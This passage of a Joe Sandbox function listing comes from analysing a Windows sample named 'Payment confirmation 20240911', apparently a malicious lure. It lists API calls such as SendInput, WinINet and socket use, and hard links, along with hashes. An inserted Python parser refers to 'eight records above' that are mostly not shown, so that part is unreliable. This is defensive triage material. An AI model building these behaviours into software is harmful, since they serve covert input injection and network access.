                                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 013213C6
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                          • API String ID: 2574300362-1587604923
                                          • Opcode ID: dd6db19c4bde227f21d60b98c22ad964d8a4d715f2ecde88c4d7f69f7fe3a7a6
                                          • Instruction ID: d23a3e542defa9e3a9eb1eb271940060f1351b894d409aebee4449159cfea88e
                                          • Opcode Fuzzy Hash: dd6db19c4bde227f21d60b98c22ad964d8a4d715f2ecde88c4d7f69f7fe3a7a6
                                          • Instruction Fuzzy Hash: 57D0A770604722DFDB311F7AE40864236DDAB4430CF00841DE697D1724DAB0C4848710
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 01343ADA
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01343AEC
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: 71a9986285eed31c451ee7e772a54f3bfe5c6628b04a780a265254277840f180
                                          • Instruction ID: 435f837192f67e5ce9bdac560b7fdcf9e580c12ce759867cd7c8dbb93702a8b9
                                          • Opcode Fuzzy Hash: 71a9986285eed31c451ee7e772a54f3bfe5c6628b04a780a265254277840f180
                                          • Instruction Fuzzy Hash: 41D05270A40323CFEB308BAAA8096423AE8AF04218F00842DE4A692210EAF0D0808B54
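The eight records above resolve their targets at run time: each pairs LoadLibraryA or LoadLibraryExW with GetProcAddress for combase.dll (RoInitialize, RoUninitialize), kernel32.dll (GetNativeSystemInfo, IsWow64Process, GetSystemWow64DirectoryW), oleaut32.dll (RegisterTypeLibForUser, UnRegisterTypeLibForUser) and advapi32.dll (RegDeleteKeyExW), so those export names are obtained through GetProcAddress rather than through the PE import table. The Python script below is an added example, not part of Joe Sandbox or of this report: it parses 'APIs' bullets in exactly the format shown and lists the resolved imports per DLL; the sample input is a constructed excerpt copied from the records above. Two caveats a reader of such a listing should keep in mind. Where the report prints GetProcAddress with only the module handle (the two combase.dll records), the script falls back to an identifier left among the LoadLibraryExW arguments; that is a heuristic read of stale stack values, not a confirmed argument. And resolving these particular exports at run time is routine in legitimate programs that must still load on Windows versions lacking them, so the list is triage context, not an indicator on its own.

```python
"""Recover run-time-resolved imports from the 'APIs' bullets of a Joe Sandbox function
listing. Added example, not Joe Sandbox code: each LoadLibrary* call is paired with the
GetProcAddress that follows it in the same function record."""
import re
from typing import Dict, List, Optional, Tuple

# "<Api>.<MODULE>(<args>), ref: <addr>" or "<Api>.<MODULE> ref: <addr>",
# optionally prefixed by "Part of subcall function <addr>:".
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
RAW_ARG = re.compile(r"^(?:[0-9A-Fa-f]{8}|\?)$")  # raw stack value, never an export name
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

def parse_api_line(line: str) -> Optional[dict]:
    """Parse one 'APIs' bullet; return None for any line that is not an API call."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return {"api": m.group("api"), "module": m.group("module"), "args": args, "ref": m.group("ref")}

def iter_records(report_text: str):
    """Yield the parsed calls of each 'APIs' section that holds at least one call."""
    current: Optional[List[dict]] = None
    for line in (ln.strip() for ln in report_text.splitlines()):
        if line == "APIs":
            if current:
                yield current
            current = []
            continue
        call = parse_api_line(line)
        if call is not None and current is not None:
            current.append(call)
    if current:
        yield current

def dynamic_imports(record: List[dict]) -> List[Tuple[str, str]]:
    """Return (dll, export) pairs for LoadLibrary* -> GetProcAddress sequences."""
    pairs: List[Tuple[str, str]] = []
    pending: Optional[dict] = None  # latest LoadLibrary* still awaiting its GetProcAddress
    for call in record:
        if call["api"] in LOADERS:
            pending = call
        elif call["api"] == "GetProcAddress" and pending is not None:
            dll = pending["args"][0].lower() if pending["args"] else "?"
            name = call["args"][1] if len(call["args"]) > 1 else "?"
            if RAW_ARG.match(name):
                # The report sometimes prints GetProcAddress with only the module handle.
                # Heuristic: an identifier left on the stack among the LoadLibrary*
                # arguments (RoInitialize in the records above) is the likely export name.
                name = next((a for a in pending["args"][1:] if not RAW_ARG.match(a)), "?")
            pairs.append((dll, name))
            pending = None
    return pairs

def collect_dynamic_imports(report_text: str) -> Dict[str, List[str]]:
    """Group every run-time-resolved export in the report by DLL, in report order."""
    by_dll: Dict[str, List[str]] = {}
    for record in iter_records(report_text):
        for dll, name in dynamic_imports(record):
            by_dll.setdefault(dll, []).append(name)
    return by_dll

# Constructed input: 'APIs' bullets copied from the function records above.
SAMPLE_REPORT = """\
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,01303028,?), ref: 01302F79
• GetProcAddress.KERNEL32(00000000), ref: 01302F80
Strings
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,01302F4E), ref: 0130304E
• GetProcAddress.KERNEL32(00000000), ref: 01303055
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 012FE6B4
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 012FE6C6
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 012FE6F1
• GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?), ref: 012FE703
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 0133EBC7
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0133EBAF,?,0133EAAC), ref: 0133EBD9
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll), ref: 01321389
• GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser,?,01321440), ref: 0132139B
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll), ref: 013213B4
• GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 013213C6
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 01343ADA
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01343AEC
"""
```

Pass the text of a whole function listing to collect_dynamic_imports to get the complete set; the constructed sample is limited to the records above. Lines that are not API bullets (section headers, dump metadata) are ignored, and LoadLibrary* calls without a following GetProcAddress produce no pair.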
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e060200230feef82304ba680f14df504dd24cc759742afe9b1eafb031c4de56
                                          • Instruction ID: c1062f261eef77b6204ab0f0a5e78d021dbbf42ca8424cc9c6b2561a5b36f9f4
                                          • Opcode Fuzzy Hash: 4e060200230feef82304ba680f14df504dd24cc759742afe9b1eafb031c4de56
                                          • Instruction Fuzzy Hash: C1C1B475A0124AEFDB19CF94C984EAEBBB5FF48309F108599E902EB255D730DE41CB90
                                          Similarity
                                          • API ID: BuffCharUpper_wcscmp
                                          • String ID:
                                          • API String ID: 820872866-0
                                          • Opcode ID: f53dd81955d7a53fc769661b500f93bff1feaa930cdc39b8e236d5101a1b344d
                                          • Instruction ID: 9c36e90b72179d2300a78156a487fcda44b0fe52ed9c3c3184fc25521b722daa
                                          • Opcode Fuzzy Hash: f53dd81955d7a53fc769661b500f93bff1feaa930cdc39b8e236d5101a1b344d
                                          • Instruction Fuzzy Hash: 2DA1FE70A2010B9BDF15DF69E5896BEBBE5FF54300F94456AED4683290EB319870C781
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 01340D85
                                          • CharLowerBuffW.USER32(?,?), ref: 01340DC8
                                            • Part of subcall function 01340458: CharLowerBuffW.USER32(?,?), ref: 01340478
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 01340FB2
                                          • _memmove.LIBCMT ref: 01340FC2
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: a09945d71f7ab177fbd90be36919d550deab44fc3c633e8c49b8b2a5c9a0a99a
                                          • Instruction ID: a3e80c4f02ce5163a572a18a68c57fdd920c1295d6d94ccbbfd5fd7cd3b476d5
                                          • Opcode Fuzzy Hash: a09945d71f7ab177fbd90be36919d550deab44fc3c633e8c49b8b2a5c9a0a99a
                                          • Instruction Fuzzy Hash: F4B1AF756143018FC718DF28C48096ABBE4FF99718F14896EFA89DB351DB31E94ACB81
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0133AF56
                                          • CoUninitialize.OLE32 ref: 0133AF61
                                            • Part of subcall function 01321050: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 013210B8
                                          • VariantInit.OLEAUT32(?), ref: 0133AF6C
                                          • VariantClear.OLEAUT32(?), ref: 0133B23F
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: e0a2c43f6d02ab2e1f8b0eb846bfe97a3425ab7e73d5455aa392c65a4353474d
                                          • Instruction ID: e0a787eab40152df4c9e1a3d72a6ee6c776d604639613f3c79b50b77c2ef551e
                                          • Opcode Fuzzy Hash: e0a2c43f6d02ab2e1f8b0eb846bfe97a3425ab7e73d5455aa392c65a4353474d
                                          • Instruction Fuzzy Hash: 14A14A756047029FDB10DF18C894B2AF7E4FF98324F04855DEA9AAB3A0DB30E904CB85
                                          APIs
                                          • _memmove.LIBCMT ref: 012EC419
                                          • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 012EC495
                                          Similarity
                                          • API ID: FileRead_memmove
                                          • String ID:
                                          • API String ID: 1325644223-0
                                          • Opcode ID: af1ebde6bd858535cf8cc34ab69504e0243a9d69d79f1fd1ace340b53c6bc866
                                          • Instruction ID: ac27484817f47b59f21a0abfbb78f1bae53945e17a7adf4d87861ec4258a866f
                                          • Opcode Fuzzy Hash: af1ebde6bd858535cf8cc34ab69504e0243a9d69d79f1fd1ace340b53c6bc866
                                          • Instruction Fuzzy Hash: E1A1EE70A1460AEBEB04CF99C888BB9FBF4FF01700F448195E9659B285E771E960CB91
                                          APIs
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                          • String ID:
                                          • API String ID: 3877424927-0
                                          • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                          • Instruction ID: 0ff70b24dfc3a3bfd7116d22738be1ec3cfd1083a01a6793cc6c6d0b505a8886
                                          • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                          • Instruction Fuzzy Hash: 5651D830A00306DBDB268FAD89A066E7BF5AF40328F14876DFA75966D0D770DB618B40
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0131D258
                                          • __itow.LIBCMT ref: 0131D292
                                            • Part of subcall function 0131D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0131D549
                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0131D2FB
                                          • __itow.LIBCMT ref: 0131D350
                                          Similarity
                                          • API ID: MessageSend$__itow
                                          • String ID:
                                          • API String ID: 3379773720-0
                                          • Opcode ID: a589670b4bb4b57dd6fc85af62ceed33097bb6e3e21cda327521bff9bed4f3a0
                                          • Instruction ID: dc48793be41967622cae507cd01674570e5bb1b90976988ef7c8dec1f71ea064
                                          • Opcode Fuzzy Hash: a589670b4bb4b57dd6fc85af62ceed33097bb6e3e21cda327521bff9bed4f3a0
                                          • Instruction Fuzzy Hash: 4341D671A0060AAFDF15DF98CC59FFE7BF9AF5A714F000029EA05A3284DB749A45CB61
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0132EF32
                                          • GetLastError.KERNEL32(?,00000000), ref: 0132EF58
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0132EF7D
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0132EFA9
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: 3773891cb4157cf3e4d901c30c30a75b3931657721057d2d64e585cbf81d8c4c
                                          • Instruction ID: 361ddd6f3c456781b95090e6ab95ef5a27632b009abe63446e40afcb776dc803
                                          • Opcode Fuzzy Hash: 3773891cb4157cf3e4d901c30c30a75b3931657721057d2d64e585cbf81d8c4c
                                          • Instruction Fuzzy Hash: 24415839610621DFCF11EF59C548A59BBE5EF99320B19C098E88AAF361DB30FC04DB91
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 013244EE
                                          • SetKeyboardState.USER32(00000080), ref: 0132450A
                                          • PostMessageW.USER32 ref: 0132456A
                                          • SendInput.USER32(00000001,?,0000001C), ref: 013245C8
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: ed3e2173f019152d1c3218f78838de8b0f7a07ed5b1b4b00f402e2ec260978e9
                                          • Instruction ID: e4c3287525d56845e9ca6183fe8cf30e28c91d9b9ed5611c44b60757ddf3eec4
                                          • Opcode Fuzzy Hash: ed3e2173f019152d1c3218f78838de8b0f7a07ed5b1b4b00f402e2ec260978e9
                                          • Instruction Fuzzy Hash: 3D310771A00278DFFF31AB6CD8087FE7FA9AB49318F14415AE1C6569C5C7748948C761
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01314DE8
                                          • __isleadbyte_l.LIBCMT ref: 01314E16
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 01314E44
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 01314E7A
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: db31614618d4d56247df9075e25665420a28abf6826fe6f9ec078d6b54e207d7
                                          • Instruction ID: ccb595b1022984d805b19238a8fc103a6106d52101950af8fa8bb1f62c39c171
                                          • Opcode Fuzzy Hash: db31614618d4d56247df9075e25665420a28abf6826fe6f9ec078d6b54e207d7
                                          • Instruction Fuzzy Hash: 2931B231604206EFDF268F78C844BAA7FA9FF41318F158528E9658B1E5E730D851CBA0
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 01347AB6
                                            • Part of subcall function 013269C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 013269E3
                                            • Part of subcall function 013269C9: GetCurrentThreadId.KERNEL32(00000000,?,01328127), ref: 013269EA
                                            • Part of subcall function 013269C9: AttachThreadInput.USER32(00000000,?,01328127), ref: 013269F1
                                          • GetCaretPos.USER32(?), ref: 01347AC7
                                          • ClientToScreen.USER32(00000000,?), ref: 01347B00
                                          • GetForegroundWindow.USER32 ref: 01347B06
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: ee5cfe924fe3d9a23ba3cc82086f446a333ac253e2d77802a820c13b5e8184f2
                                          • Instruction ID: 52f91f4aa36604097815437a43047b336fc6c368cc96f8932f9c6cac149a34c8
                                          • Opcode Fuzzy Hash: ee5cfe924fe3d9a23ba3cc82086f446a333ac253e2d77802a820c13b5e8184f2
                                          • Instruction Fuzzy Hash: FE312171D00109AFCB10EFB9D8859EFFBFDEF59314B10806AE916E3210DA359E058BA0
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 013349B7
                                            • Part of subcall function 01334A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01334A60
                                            • Part of subcall function 01334A41: InternetCloseHandle.WININET(00000000), ref: 01334AFD
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: a443ea2a11d3eb985f54998e3180791e832cb49be8e78d537b6c043eede72bdd
                                          • Instruction ID: 62ad9467b8123f2992ba640ce802db8324151f5ed6429b3ae534e862c06acaf0
                                          • Opcode Fuzzy Hash: a443ea2a11d3eb985f54998e3180791e832cb49be8e78d537b6c043eede72bdd
                                          • Instruction Fuzzy Hash: D721A172300605BFEB129FA49C00FBABBADFBC8715F04401AFA4596650EB71D421A798
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EC), ref: 013488A3
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 013488BD
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 013488CB
                                          • SetLayeredWindowAttributes.USER32 ref: 013488D9
                                          Similarity
                                          • API ID: Window$Long$AttributesLayered
                                          • String ID:
                                          • API String ID: 2169480361-0
                                          • Opcode ID: 9aa66a931585eb2bf2d872dd0760b8a61e9d29935ea0df374a9c63ae549d691b
                                          • Instruction ID: 5d4e8967b80e665c33f2447c07e2b6d264d4bf2ab15d8fca6fe5db1b4b388a51
                                          • Opcode Fuzzy Hash: 9aa66a931585eb2bf2d872dd0760b8a61e9d29935ea0df374a9c63ae549d691b
                                          • Instruction Fuzzy Hash: 4811AC31304115AFEB15ABA8DC08FBA7BEEAF95324F048119F916D72A1CB60BC008B90
                                          APIs
                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0133906D
                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 0133907F
                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 0133908C
                                          • WSAGetLastError.WSOCK32(00000000), ref: 013390A3
                                          Similarity
                                          • API ID: ErrorLastacceptselect
                                          • String ID:
                                          • API String ID: 385091864-0
                                          • Opcode ID: ec3a09a3acfa73758823a7301afb99500c6438b21b634dfd699e657f6c7de0f6
                                          • Instruction ID: 1a89b4f1f0d46ec5fc35930b8fbe180b6e5ad08ff69399c9b3166b102cdbe49a
                                          • Opcode Fuzzy Hash: ec3a09a3acfa73758823a7301afb99500c6438b21b634dfd699e657f6c7de0f6
                                          • Instruction Fuzzy Hash: F221A871A001249FC720DF69D884A9EBBFCEF4A714F00816AE849D7290D774DA45CFD1
                                          APIs
                                            • Part of subcall function 01322CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,013218FD,?,?,?,013226BC,00000000,000000EF,00000119,?,?), ref: 01322CB9
                                            • Part of subcall function 01322CAA: lstrcpyW.KERNEL32(00000000,?), ref: 01322CDF
                                            • Part of subcall function 01322CAA: lstrcmpiW.KERNEL32(00000000,?,013218FD,?,?,?,013226BC,00000000,000000EF,00000119,?,?), ref: 01322D10
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,013226BC,00000000,000000EF,00000119,?,?,00000000), ref: 01321916
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0132193C
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,013226BC,00000000,000000EF,00000119,?,?,00000000), ref: 01321970
                                          Strings
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: 8b65c7829c9059d5a0c47300473d43a2affc248a504e359f4eaf8d5c0eabb5d4
                                          • Instruction ID: 3ed5227fdc5f47f291faf94199dfdb069157166d47832d74fdefec6806e8a65f
                                          • Opcode Fuzzy Hash: 8b65c7829c9059d5a0c47300473d43a2affc248a504e359f4eaf8d5c0eabb5d4
                                          • Instruction Fuzzy Hash: E311E63A200315EFDB26AF79D844D7A77B8FF45354B40802AF846CB254EB719441C7D0
                                          APIs
                                          • _free.LIBCMT ref: 01313D65
                                            • Part of subcall function 013045EC: __FF_MSGBANNER.LIBCMT ref: 01304603
                                            • Part of subcall function 013045EC: __NMSG_WRITE.LIBCMT ref: 0130460A
                                            • Part of subcall function 013045EC: RtlAllocateHeap.NTDLL(00720000,00000000,00000001,?,?,?,?,01300127,?,012E125D,00000058,?,?), ref: 0130462F
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 5761efd9e406b85a537b498d19584d4c006dccb3d2b8d21b15aefe999271fe80
                                          • Instruction ID: 14ed9a171bc42b1ce315d5d6a4cfd6b56039d914178792040c3fd934ba72eb41
                                          • Opcode Fuzzy Hash: 5761efd9e406b85a537b498d19584d4c006dccb3d2b8d21b15aefe999271fe80
                                          • Instruction Fuzzy Hash: DF11A332901216ABDB3A3FBCA8146AA3FDCBF1037CF904569E9899A1D8DB3489408750
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 013213EE
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 01321409
                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0132141F
                                          • FreeLibrary.KERNEL32(?), ref: 01321474
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                          • String ID:
                                          • API String ID: 3137044355-0
                                          • Opcode ID: 78e78bc7e8910b504b8aa275506cacca6f116e8ef9460a89b72764a96b0ef108
                                          • Instruction ID: f9aa4df1577a51d49f5c66ab64ba84be14d947063030e49990d2e9b731393432
                                          • Opcode Fuzzy Hash: 78e78bc7e8910b504b8aa275506cacca6f116e8ef9460a89b72764a96b0ef108
                                          • Instruction Fuzzy Hash: 9721AF7160021DEBEB20AF95ED88ADABBBCEF00708F008469D65AA7410D7B4EA04CF50
                                          APIs
                                            • Part of subcall function 012FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0132AEA5,?,?,00000000,00000008), ref: 012FF282
                                            • Part of subcall function 012FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0132AEA5,?,?,00000000,00000008), ref: 012FF2A6
                                          • gethostbyname.WSOCK32(?,?,?), ref: 013392F0
                                          • WSAGetLastError.WSOCK32(00000000), ref: 013392FB
                                          • _memmove.LIBCMT ref: 01339328
                                          • inet_ntoa.WSOCK32(?), ref: 01339333
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 90c60acd5e4e22d7a6fc5db7dab936ad7a5c9bd0fc107017be96c3edd28f8c53
                                          • Instruction ID: 907c5b8cd4eac676396ade1a1574ed048cd96c3eaa67ea1224d54846e0fa414f
                                          • Opcode Fuzzy Hash: 90c60acd5e4e22d7a6fc5db7dab936ad7a5c9bd0fc107017be96c3edd28f8c53
                                          • Instruction Fuzzy Hash: F9118E7660000AAFCB00FFA4C958CBEB7B9EF68314B504028E506A7260DB30AE14CB61
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0131C285
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0131C297
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0131C2AD
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0131C2C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 8271ff7a634f4dbaf65a359054488336756c3becf5ee05bbafc5e0bff5227ae7
                                          • Instruction ID: 5aef56bb26f6bd20dee80580c919efd440fe41d30a124769bcd056f31563bda3
                                          • Opcode Fuzzy Hash: 8271ff7a634f4dbaf65a359054488336756c3becf5ee05bbafc5e0bff5227ae7
                                          • Instruction Fuzzy Hash: 1511037A940218BFEF11DBE8C885EDDBBB8FB08714F204091EA05B7294D671AE11DB94
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 01327C6C
                                          • MessageBoxW.USER32 ref: 01327C9F
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01327CB5
                                          • CloseHandle.KERNEL32(00000000), ref: 01327CBC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2880819207-0
                                          • Opcode ID: 9faca559db11763526212a452addaa4b9c572c849b83a6a7b5a2444553cfccd5
                                          • Instruction ID: fc3eac739729ea6548458e50cde0951b7ada41237fa8b3879ebf13f0ace00b01
                                          • Opcode Fuzzy Hash: 9faca559db11763526212a452addaa4b9c572c849b83a6a7b5a2444553cfccd5
                                          • Instruction Fuzzy Hash: 8B112B76B04264FFDB229FBCDC08AAB7FADBB04328F044255F555E3245D6B089048760
                                          APIs
                                          • CreateWindowExW.USER32 ref: 012FC657
                                          • GetStockObject.GDI32(00000011), ref: 012FC66B
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 012FC675
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateMessageObjectSendStockWindow
                                          • String ID:
                                          • API String ID: 3970641297-0
                                          • Opcode ID: b57a0a72486e67932cae9d08c6a3b285618d179bb1c80969f8c305f4e9fd1e37
                                          • Instruction ID: 6e2d55e9e2c8662ff05acb130afa83b715d7c8216eec46df5efa7a1a5e8136bc
                                          • Opcode Fuzzy Hash: b57a0a72486e67932cae9d08c6a3b285618d179bb1c80969f8c305f4e9fd1e37
                                          • Instruction Fuzzy Hash: 64118BB261564DBFEF224FA49C41EEABF6DEF48364F054229FB0452050C732EC609BA0
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 013249EE
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 01324A13
